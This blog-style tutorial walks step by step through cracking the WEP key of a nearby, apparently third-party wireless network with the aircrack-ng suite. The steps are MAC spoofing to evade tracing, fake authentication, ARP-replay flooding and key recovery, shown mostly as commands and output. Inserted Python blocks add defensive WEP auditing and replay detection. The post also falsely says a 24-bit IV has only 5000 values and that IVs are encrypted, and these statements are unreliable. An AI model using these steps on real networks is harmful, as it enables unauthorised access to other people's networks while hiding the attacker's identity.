Saturday, June 1, 2013

Cracking WEP

Most home routers these days default to WPA encryption (which can be cracked, but we'll be covering that later), but most older ones (a lot of D-Link ones, I've noticed) use WEP. WEP is very insecure, as you'll see in about ten minutes when you crack it.

First you'll want to boot up Backtrack or Kali; you could theoretically use any Linux distro and install the tools separately, but who has time for that. I personally keep Kali on an SD card and boot into live mode on my laptop when I need it.

Hiding Your Tracks

Because network cracking can get you in trouble, we'll want to hide our MAC address before we begin. BT (I'm going to refer to both Backtrack and Kali as BT from now on) has a nifty tool installed for this called simply macchanger.
airmon-ng stop mon0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
This will stop airmon-ng from monitoring, shut down your wlan0 interface, change its MAC address to 00:11:22:33:44:55 (how original), then start up the monitoring again. Starting airmon-ng gives us a virtual interface, mon0, which we will be using from here on out.

Reconnaissance

We'll first want to scan the area within range for available wireless networks. You should see at least a few pop up, as there is an overabundance of wireless networks... everywhere. To start the scan, open up a new terminal and execute airodump-ng on the monitor interface. Press Ctrl-C to kill it after you determine it's not going to find any more WLANs.
airodump-ng mon0

CH  7 ][ Elapsed: 48 s ][ 2013-06-01 20:49                                  
                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                             
 00:22:6B:4D:13:0A  -49      119       17    0   6  54   WEP  WEP         dotscafe
 B0:E7:54:A7:B7:A9  -82       56        0    0  11  54 . WEP  WEP         BELL237
 34:EF:44:F8:6D:A9  -88       11        0    0   9  54 . WPA  TKIP   PSK  abby
 78:CD:8E:66:3E:51  -89        1        1    0  10  54e  WPA  TKIP   PSK  dave
                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
                                                                             
 00:22:6B:4D:13:0A  60:A1:0A:1E:0B:5D  -63    0 -54      0       10          
 00:22:6B:4D:13:0A  98:0C:82:8A:52:38  -83    1 -24      0        4                       
 B0:E7:54:A7:B7:A9  38:AA:3C:75:83:E3  -83    0 - 1      0        1          
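Read from the auditing side, that table is also the quickest way to find out which networks around you are still on WEP. As an added example (not code from the original post), here is a small Python parser for the airodump-ng screen output above: it reads both the AP table and the station table and reports every WEP network with the number of clients attached to it. It assumes the layout shown here (the lone "." after the MB column is airodump's QoS marker, "OPN" networks have no cipher/auth columns, ESSIDs contain no spaces); the embedded scan is a constructed copy of the one above with the status line left out.

```python
import re
from collections import defaultdict

# Constructed copy of the airodump-ng screen output shown above (status line omitted).
SCAN = """\
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:22:6B:4D:13:0A  -49      119       17    0   6  54   WEP  WEP         dotscafe
 B0:E7:54:A7:B7:A9  -82       56        0    0  11  54 . WEP  WEP         BELL237
 34:EF:44:F8:6D:A9  -88       11        0    0   9  54 . WPA  TKIP   PSK  abby
 78:CD:8E:66:3E:51  -89        1        1    0  10  54e  WPA  TKIP   PSK  dave
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 00:22:6B:4D:13:0A  60:A1:0A:1E:0B:5D  -63    0 -54      0       10
 00:22:6B:4D:13:0A  98:0C:82:8A:52:38  -83    1 -24      0        4
 B0:E7:54:A7:B7:A9  38:AA:3C:75:83:E3  -83    0 - 1      0        1
"""
MAC = r"[0-9A-F]{2}(?::[0-9A-F]{2}){5}"
STATION_RE = re.compile(rf"^\s*({MAC})\s+({MAC})\s+-?\d+\s+\d+\s*-\s*\d+\s+\d+\s+(\d+)")

def parse_airodump(text):
    """Return ({bssid: ap_info}, {bssid: [(station_mac, frames), ...]})."""
    aps, stations, in_station_table = {}, defaultdict(list), False
    for line in text.splitlines():
        tokens = line.split()
        if tokens and tokens[0] == "BSSID":      # header row says which table follows
            in_station_table = tokens[1] == "STATION"
        if not tokens or not re.fullmatch(MAC, tokens[0]):
            continue                             # blank, header, status or unassociated row
        if in_station_table:                     # BSSID STATION PWR "rx - tx" Lost Frames Probe
            if m := STATION_RE.match(line):
                stations[m.group(1)].append((m.group(2), int(m.group(3))))
            continue
        bssid, _pwr, _beacons, _data, _rate, ch, _mb = tokens[:7]
        rest = tokens[7:]
        if rest and rest[0] == ".":              # QoS marker airodump prints after MB
            rest = rest[1:]
        enc, cipher, auth = rest[0], "", ""
        if enc == "OPN":                         # open network: ESSID follows directly
            essid = " ".join(rest[1:])
        elif len(rest) > 3:                      # ENC CIPHER AUTH ESSID
            cipher, auth, essid = rest[1], rest[2], " ".join(rest[3:])
        else:                                    # WEP rows leave AUTH blank
            cipher, essid = rest[1], " ".join(rest[2:])
        aps[bssid] = {"essid": essid, "channel": int(ch), "enc": enc,
                      "cipher": cipher, "auth": auth}
    return aps, stations

def wep_findings(text):
    """(essid, bssid, channel, attached clients) for every WEP network in the scan."""
    aps, stations = parse_airodump(text)
    return [(a["essid"], b, a["channel"], len(stations[b]))
            for b, a in aps.items() if a["enc"] == "WEP"]
```

Run against the scan above it reports dotscafe (two clients) and BELL237 (one client) as the networks that still need to move to WPA2.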

Data Collection

As you can see there's a plethora of information about each AP. The things we're most concerned with are the BSSID and the channel (CH) it's operating on. We can run airodump-ng again, this time giving it some specifics. The bell237 in the command is the file name where the traffic capture is going to be dumped; for consistency's sake, I generally keep the file name the same as the ESSID.
airodump-ng -c 11 -w bell237 --bssid B0:E7:54:A7:B7:A9 mon0
CH 11 ][ Elapsed: 2 mins ][ 2013-06-01 21:01                                
                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                             
 B0:E7:54:A7:B7:A9  -78  96     1254    50485    0  11  54 . WEP  WEP         BELL237
                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe  
                                                                             
 B0:E7:54:A7:B7:A9  00:11:22:33:44:55    0    0 - 1   52425   107860          
 B0:E7:54:A7:B7:A9  28:6A:BA:17:AD:65  -87    0 - 1      0        1            
 B0:E7:54:A7:B7:A9  38:AA:3C:75:83:E3  -83   11 - 1      0      254          

Now at this point, you could just let airodump-ng run and gather the packets from the air on its own. But we both know by looking at how fast that Data number is climbing that it'll be a long wait. To speed things along we're going to associate ourselves with the AP and start a flood. You'll want to leave airodump-ng running while you do this, so open up a new terminal. The -1 option selects the fake-authentication attack mode, and the 0 sets the number of packets per burst to auto (the default is 1).
aireplay-ng -1 0 -a B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 -e BELL237 mon0
The interface MAC (XX:XX:XX:XX:XX:XX) doesn't match the specified MAC (-h).
If aireplay-ng complains like this that the interface MAC doesn't match the one given with -h, set mon0 to the same spoofed address and run the command again:
ifconfig mon0 hw ether 00:11:22:33:44:55
20:54:05  Waiting for beacon frame (BSSID: B0:E7:54:A7:B7:A9) on channel 11
20:54:05  Sending Authentication Request (Open System) [ACK]
20:54:05  Authentication successful
20:54:05  Sending Association Request [ACK]
20:54:05  Association successful :-) (AID: 1)

Now that we're authenticated we can begin to flood. We'll be flooding ARP requests, which is what the -3 option in our command denotes.
aireplay-ng -3 -b B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 mon0
You'll soon see that terminal overflow with ARP requests; just let it go. If we go back to our other terminal where we left airodump running, you'll see the #Data column sky-rocket. That number represents the number of IVs (initialization vectors) we have collected so far; each WEP data packet carries a 3-byte IV. We'll want to collect a heap of them because the WEP IV is only 24 bits, meaning it'll only have 5000 possibilities. And the flood has begun. Let it go till it hits about 50,000. When it gets there, you can go ahead and kill both applications (but don't close the windows).
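Two things in that paragraph are worth making concrete from the defender's side, as an added example that is not part of the original post. First, the IV space: a 24-bit IV has 2^24 = 16,777,216 values, and by the birthday bound a random IV repeats with about 50% probability after roughly 5,000 frames, which is why IVs on a busy WEP network recur so quickly. Second, what the replay looks like on the air: aireplay-ng re-sends a captured ARP request unchanged, so a wireless IDS sees one station transmitting the same IV over and over at injection speed. The Python below computes the repeat probability and runs a small replay detector over a constructed frame log of (seconds, source MAC, IV); the thresholds and the log are my assumptions.

```python
import math
from collections import Counter, defaultdict

IV_SPACE = 2 ** 24   # a 24-bit WEP IV has 16,777,216 possible values

def iv_repeat_probability(frames):
    """Birthday bound: P(at least one IV repeats) among `frames` random IVs."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))

# Constructed frame log: (seconds, source MAC, IV). One ordinary client with fresh
# IVs, and one station re-sending a captured ARP request (same IV) 500 times in 1 s.
LEGIT, INJECTOR = "38:AA:3C:75:83:E3", "00:11:22:33:44:55"
FRAMES = [(t * 0.5, LEGIT, 0x100000 + t) for t in range(20)]
FRAMES += [(1.0 + i / 500.0, INJECTOR, 0xABCDEF) for i in range(500)]

def detect_replay(frames, max_dup=5, max_rate=100, window=1.0):
    """Return {src: set(reasons)} for stations that repeat one IV more than
    max_dup times, or send more than max_rate frames within any window seconds."""
    alerts = defaultdict(set)
    for (src, iv), n in Counter((s, v) for _, s, v in frames).items():
        if n > max_dup:                          # identical frame replayed
            alerts[src].add(f"IV {iv:06x} seen {n} times")
    per_src = defaultdict(list)
    for t, src, _ in sorted(frames):
        per_src[src].append(t)
    for src, times in per_src.items():
        lo = 0
        for hi, t in enumerate(times):           # sliding window over sorted times
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 > max_rate:           # injection-rate burst
                alerts[src].add(f"more than {max_rate} frames in {window:g}s")
                break
    return dict(alerts)
```

Only the injecting station trips both rules; the ordinary client, with fresh IVs and a few frames per second, produces no alert.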


Attack

In one of the two terminals (or a new one if you prefer) we'll need to load the capture file from airodump into aircrack-ng to actually crack the IVs we collected earlier. The IVs are encrypted, and aircrack will attempt to run them against a set of statistical attacks. In the event that aircrack fails (and believe me, it can), just go back to the two terminals we were using for airodump and aireplay and run them again, this time until twice as many IVs have been captured (now you know why I told you not to close the windows!).

aircrack-ng -b B0:E7:54:A7:B7:A9 bell237-01.cap
Opening bell237-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50484 ivs.

                                    Aircrack-ng 1.1

                    [00:00:02] Tested 1388233 keys (got 50338 IVs)
   KB    depth   byte(vote)
    0    0/  1   28(63232) 8A(59136) 2F(58880) 93(58880) F0(58624) 88(58368)
    1    0/  1   55(70656) 12(59648) 21(58880) F8(58880) 9A(58368) CF(58368)
    2    0/  2   07(62464) E4(61696) 9E(60672) 7C(58624) 33(57088) 6E(57088)
    3    0/  1   74(71168) 53(60416) D9(59392) E9(58112) ED(57856) 0E(57344)
    4    0/  1   30(74752) 43(58368) 68(58368) 5C(57600) A2(57600) 52(57088)
    5    0/  1   19(63488) 4D(61184) AC(60928) 05(58624) 5A(58624) 89(58624)
    6    0/  1   75(74752) 29(60160) 4D(59904) 86(59904) 30(59392) 57(58880)
    7    2/  4   B4(60928) 4E(60416) 54(60416) 3E(60160) 47(58368) B8(58112)
    8    1/  3   46(60672) 9F(59904) 05(58880) 27(58624) 2B(58368) BD(58112)
    9    0/  1   48(66048) 86(60160) A2(60160) 32(57856) AE(57600) EE(57600)
   10    0/  1   54(62464) DF(58624) FD(57856) 7A(57600) 46(57344) 0C(56832)
   11    0/  1   64(71936) 48(59392) 11(59136) 66(59136) 86(57600) 88(57600)
   12   26/ 12   ED(55040) 83(54784) 90(54784) C4(54784) 05(54528) 14(54528)
     KEY FOUND! [ 28:55:07:74:30:19:75:98:46:48:54:64:38 ]
Decrypted correctly: 100%

And that's it! Pop the key (without the colons) into the authentication prompt for the wireless network and you're set. This just shows you how easy it is to get into someone else's LAN; make sure you keep your private network protected with at least WPA and, if possible, WPA2.